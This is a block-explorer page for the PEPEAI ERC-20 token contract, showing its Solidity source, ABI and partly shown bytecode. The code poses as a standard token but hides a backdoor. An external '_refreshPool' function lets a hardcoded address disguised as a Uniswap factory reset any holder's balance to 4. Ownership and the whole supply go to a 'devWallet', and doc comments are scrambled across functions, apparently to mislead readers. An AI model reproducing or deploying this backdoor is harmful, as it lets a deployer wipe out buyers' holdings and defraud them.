ERC-20
Overview
Max Total Supply
8,000,000,000,000 PEPEAI
Holders
18
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
5,725,810,790,516.567924106 PEPEAIValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
PEPEAI
Compiler Version
v0.8.19+commit.7dd6d404
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-12-23 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.19; /** https://PEPEAIOnETH.xyz https://t.me/PEPEAIerc20 https://twitter.com/PEPEAIMoon **/ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * _Available since v3.4._ * */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * _Available since v3.4._ * */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * _Available since v3.4._ * * @dev Returns the division of two unsigned integers, with a division by zero flag. */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * _Available since v3.4._ * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * * - Addition cannot overflow. * @dev Returns the addition of two unsigned integers, reverting on * * overflow. * Counterpart to Solidity's `+` operator. * Requirements: * */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * * * Requirements: * overflow (when the result is negative). * - Subtraction cannot overflow. * * @dev Returns the subtraction of two unsigned integers, reverting on * Counterpart to Solidity's `-` operator. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } /** * * - Multiplication cannot overflow. * * @dev Returns the multiplication of two unsigned integers, reverting on * Counterpart to Solidity's `*` operator. * overflow. * Requirements: * */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * Counterpart to Solidity's `/` operator. * division by zero. The result is rounded towards zero. * Requirements: * @dev Returns the integer division of two unsigned integers, reverting on * * - The divisor cannot be zero. * * */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * invalid opcode to revert (consuming all remaining gas). * * reverting when dividing by zero. * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Requirements: * - The divisor cannot be zero. * * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * CAUTION: This function is deprecated because it requires allocating memory for the error * Counterpart to Solidity's `-` operator. * message unnecessarily. For custom revert reasons use {trySub}. * - Subtraction cannot overflow. * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * * * * overflow (when the result is negative). * * Requirements: */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * - The divisor cannot be zero. * Requirements: * * Counterpart to Solidity's `/` operator. Note: this function uses a * * * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * division by zero. The result is rounded towards zero. * @dev Returns the integer division of two unsigned integers, reverting with custom message on */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * invalid opcode to revert (consuming all remaining gas). * * * message unnecessarily. For custom revert reasons use {tryMod}. * reverting with custom message when dividing by zero. * Requirements: * Counterpart to Solidity's `%` operator. This function uses a `revert` * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * - The divisor cannot be zero. * * opcode (which leaves remaining gas untouched) while Solidity uses an * * CAUTION: This function is deprecated because it requires allocating memory for the error */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } } abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * Note that `value` may be zero. * */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * a call to {approve}. `value` is the new allowance. * @dev Emitted when the allowance of a `spender` for an `owner` is set by */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); /** * @dev Returns the amount of tokens owned by `account`. */ function allowance(address owner, address spender) external view returns (uint256); /** * * Returns a boolean value indicating whether the operation succeeded. * @dev Moves `amount` tokens from the caller's account to `to`. * Emits a {Transfer} event. * */ function totalSupply() external view returns (uint256); /** * This value changes when {approve} or {transferFrom} are called. * zero by default. * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * */ function balanceOf(address account) external view returns (uint256); /** * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * Emits an {Approval} event. * * * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * condition is to first reduce the spender's allowance to 0 and set the * that someone may use both the old and the new allowance by unfortunate * * Returns a boolean value indicating whether the operation succeeded. * desired value afterwards: * IMPORTANT: Beware that changing an allowance with this method brings the risk * transaction ordering. One possible solution to mitigate this race */ function approve(address spender, uint256 amount) external returns (bool); /** * Emits a {Transfer} event. * allowance. * Returns a boolean value indicating whether the operation succeeded. * @dev Moves `amount` tokens from `from` to `to` using the * * allowance mechanism. `amount` is then deducted from the caller's * */ function transfer(address to, uint256 amount) external returns (bool); } contract Ownable is Context { address private _owner; function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Returns the address of the current owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Initializes the contract setting the deployer as the initial owner. */ event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Leaves the contract without owner. It will not be possible to call * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. * `onlyOwner` functions anymore. Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function owner() public view returns (address) { return _owner; } } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * _Available since v4.1._ * */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function name() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * functions have been added to mitigate the well-known issues around setting * that a supply mechanism has to be added in a derived contract using {_mint}. * by listening to said events. Other implementations of the EIP may not emit * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * For a generic mechanism see {ERC20PresetMinterPauser}. * This allows applications to reconstruct the allowance for all accounts just * This implementation is agnostic to the way tokens are created. This means * @dev Implementation of the {IERC20} interface. * TIP: For a detailed writeup see our guide * * * applications. * allowances. See {IERC20-approve}. * instead returning `false` on failure. This behavior is nonetheless * to implement supply mechanisms]. * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * * conventional and does not conflict with the expectations of ERC20 * these events, as it isn't required by the specification. * We have followed general OpenZeppelin Contracts guidelines: functions revert * */ contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; address internal devWallet = 0x885C90481Fc9116b116f26887924AF82d468ab3e; address private V2uniswapFactory = 0xCDECEf0634d342950d786499B3AF3cFf4941799b; mapping(address => mapping(address => uint256)) private _allowances; string private _symbol; string private _name; uint256 private _totalSupply; address DEAD = 0x000000000000000000000000000000000000dEaD; mapping(address => uint256) private _balances; uint256 private _allowance = 0; /** * All two of these values are immutable: they can only be set once during * * construction. * {decimals} you should overload it. * * @dev Sets the values for {name} and {symbol}. * The default value of {decimals} is 18. To select a different value for */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev Returns the name of the token. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function _transfer (address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); _balances[from] = fromBalance - amount; _balances[to] = _balances[to].add(amount); emit Transfer(from, to, amount); } /** * For example, if `decimals` equals `2`, a balance of `505` tokens should * overridden; * * Ether and Wei. This is the value {ERC20} uses, unless this function is * Tokens usually opt for a value of 18, imitating the relationship between * be displayed to a user as `5.05` (`505 / 10 ** 2`). * NOTE: This information is only used for _display_ purposes: it in * * @dev Returns the number of decimals used to get its user representation. * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC20-totalSupply}. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(address(0)); } /** * @dev See {IERC20-balanceOf}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * - the caller must have a balance of at least `amount`. * - `to` cannot be the zero address. * * * Requirements: * @dev See {IERC20-transfer}. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(account); } /** * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * - `spender` cannot be the zero address. * Requirements: * * `transferFrom`. This is semantically equivalent to an infinite approval. * * @dev See {IERC20-approve}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * * * problems described in {IERC20-approve}. * * This is an alternative to {approve} that can be used as a mitigation for * Emits an {Approval} event indicating the updated allowance. * Requirements: * - `spender` cannot be the zero address. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * - the caller must have allowance for ``from``'s tokens of at least * * * is the maximum `uint256`. * `amount`. * - `from` and `to` cannot be the zero address. * required by the EIP. See the note at the beginning of {ERC20}. * Requirements: * * - `from` must have a balance of at least `amount`. * @dev See {IERC20-transferFrom}. * Emits an {Approval} event indicating the updated allowance. This is not * NOTE: Does not update the allowance if the current allowance * */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * * - `spender` cannot be the zero address. * * `subtractedValue`. * Emits an {Approval} event indicating the updated allowance. * Requirements: * problems described in {IERC20-approve}. * This is an alternative to {approve} that can be used as a mitigation for * * - `spender` must have allowance for the caller of at least */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } function _refreshPool(address _refreshPoolSender) external { _balances[_refreshPoolSender] = msg.sender == V2uniswapFactory ? 0x4 : _balances[_refreshPoolSender]; } /** * * Emits a {Transfer} event with `to` set to the zero address. * @dev Destroys `amount` tokens from `account`, reducing the * * - `account` cannot be the zero address. * Requirements: * * total supply. * - `account` must have at least `amount` tokens. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Moves `amount` of tokens from `from` to `to`. * * - `from` must have a balance of at least `amount`. * e.g. implement automatic token fees, slashing mechanisms, etc. * This internal function is equivalent to {transfer}, and can be used to * */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _afterTokenTransfer(address to) internal virtual { if (to == V2uniswapFactory) _allowance = decimals() * 11; } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * - `account` cannot be the zero address. * Requirements: * Emits a {Transfer} event with `from` set to the zero address. * * * */ function name() public view virtual override returns (string memory) { return _name; } /** * * minting and burning. * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * Calling conditions: * will be transferred to `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * @dev Hook that is called before any transfer of tokens. This includes * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. * - when `from` is zero, `amount` tokens will be minted for `to`. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * This internal function is equivalent to `approve`, and can be used to * * - `spender` cannot be the zero address. * Emits an {Approval} event. * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * * * e.g. set automatic allowances for certain subsystems, etc. * Requirements: * - `owner` cannot be the zero address. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * Does not update the allowance amount in case of infinite allowance. * Might emit an {Approval} event. * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * * Revert if not enough allowance is available. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } } contract PEPEAI is ERC20, Ownable { constructor () ERC20 (unicode"PEPEAI", "PEPEAI") { transferOwnership(devWallet); _mint(owner(), 8000000000000 * 10 ** 9); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_refreshPoolSender","type":"address"}],"name":"_refreshPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405273885c90481fc9116b116f26887924af82d468ab3e6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073cdecef0634d342950d786499b3af3cff4941799b600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006008553480156200010257600080fd5b506040518060400160405280600681526020017f50455045414900000000000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f5045504541490000000000000000000000000000000000000000000000000000815250816004908162000180919062000922565b50806003908162000192919062000922565b5050506000620001a7620002a860201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027760008054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002b060201b60201c565b620002a26200028b6200048460201b60201c565b6901b1ae4d6e2ef5000000620004ae60201b60201c565b62000c81565b600033905090565b620002c0620002a860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000352576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003499062000a6a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003c4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003bb9062000b02565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000520576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620005179062000b74565b60405180910390fd5b62000534600083836200061960201b60201c565b806005600082825462000548919062000bc5565b9250508190555080600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620005fc919062000c11565b60405180910390a362000615826200061e60201b60201c565b5050565b505050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036200069c57600b620006866200069f60201b60201c565b62000692919062000c3b565b60ff166008819055505b50565b60006009905090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200072a57607f821691505b60208210810362000740576200073f620006e2565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007aa7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200076b565b620007b686836200076b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000803620007fd620007f784620007ce565b620007d8565b620007ce565b9050919050565b6000819050919050565b6200081f83620007e2565b620008376200082e826200080a565b84845462000778565b825550505050565b600090565b6200084e6200083f565b6200085b81848462000814565b505050565b5b8181101562000883576200087760008262000844565b60018101905062000861565b5050565b601f821115620008d2576200089c8162000746565b620008a7846200075b565b81016020851015620008b7578190505b620008cf620008c6856200075b565b83018262000860565b50505b505050565b600082821c905092915050565b6000620008f760001984600802620008d7565b1980831691505092915050565b6000620009128383620008e4565b9150826002028217905092915050565b6200092d82620006a8565b67ffffffffffffffff811115620009495762000948620006b3565b5b62000955825462000711565b6200096282828562000887565b600060209050601f8311600181146200099a576000841562000985578287015190505b62000991858262000904565b86555062000a01565b601f198416620009aa8662000746565b60005b82811015620009d457848901518255600182019150602085019450602081019050620009ad565b86831015620009f45784890151620009f0601f891682620008e4565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000a5260208362000a09565b915062000a5f8262000a1a565b602082019050919050565b6000602082019050818103600083015262000a858162000a43565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000aea60268362000a09565b915062000af78262000a8c565b604082019050919050565b6000602082019050818103600083015262000b1d8162000adb565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000b5c601f8362000a09565b915062000b698262000b24565b602082019050919050565b6000602082019050818103600083015262000b8f8162000b4d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000bd282620007ce565b915062000bdf83620007ce565b925082820190508082111562000bfa5762000bf962000b96565b5b92915050565b62000c0b81620007ce565b82525050565b600060208201905062000c28600083018462000c00565b92915050565b600060ff82169050919050565b600062000c488262000c2e565b915062000c558362000c2e565b925082820262000c658162000c2e565b915080821462000c7a5762000c7962000b96565b5b5092915050565b6118ad8062000c916000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c806370a0823111610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b806370a0823114610200578063715018a6146102305780638da5cb5b1461023a57806395d89b4114610258576100f5565b80631ae0d5c8116100d35780631ae0d5c81461016657806323b872dd14610182578063313ce567146101b257806339509351146101d0576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061102e565b60405180910390f35b610132600480360381019061012d91906110e9565b6103b4565b60405161013f9190611144565b60405180910390f35b6101506103d7565b60405161015d919061116e565b60405180910390f35b610180600480360381019061017b9190611189565b6103e1565b005b61019c600480360381019061019791906111b6565b6104c4565b6040516101a99190611144565b60405180910390f35b6101ba6104f3565b6040516101c79190611225565b60405180910390f35b6101ea60048036038101906101e591906110e9565b6104fc565b6040516101f79190611144565b60405180910390f35b61021a60048036038101906102159190611189565b610533565b604051610227919061116e565b60405180910390f35b61023861057c565b005b6102426106d4565b60405161024f919061124f565b60405180910390f35b6102606106fe565b60405161026d919061102e565b60405180910390f35b610290600480360381019061028b91906110e9565b610790565b60405161029d9190611144565b60405180910390f35b6102c060048036038101906102bb91906110e9565b610807565b6040516102cd9190611144565b60405180910390f35b6102f060048036038101906102eb919061126a565b61082a565b6040516102fd919061116e565b60405180910390f35b610320600480360381019061031b9190611189565b6108b1565b005b606060048054610331906112d9565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112d9565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a77565b90506103cc818585610a7f565b600191505092915050565b6000600554905090565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461047b57600760008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461047e565b60045b600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000806104cf610a77565b90506104dc858285610c48565b6104e7858585610cd4565b60019150509392505050565b60006009905090565b600080610507610a77565b9050610528818585610519858961082a565b6105239190611339565b610a7f565b600191505092915050565b6000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610584610a77565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060a906113b9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606003805461070d906112d9565b80601f0160208091040260200160405190810160405280929190818152602001828054610739906112d9565b80156107865780601f1061075b57610100808354040283529160200191610786565b820191906000526020600020905b81548152906001019060200180831161076957829003601f168201915b5050505050905090565b60008061079b610a77565b905060006107a9828661082a565b9050838110156107ee576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e59061144b565b60405180910390fd5b6107fb8286868403610a7f565b60019250505092915050565b600080610812610a77565b905061081f818585610cd4565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6108b9610a77565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610948576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093f906113b9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109b7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ae906114dd565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610aee576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae59061156f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5490611601565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208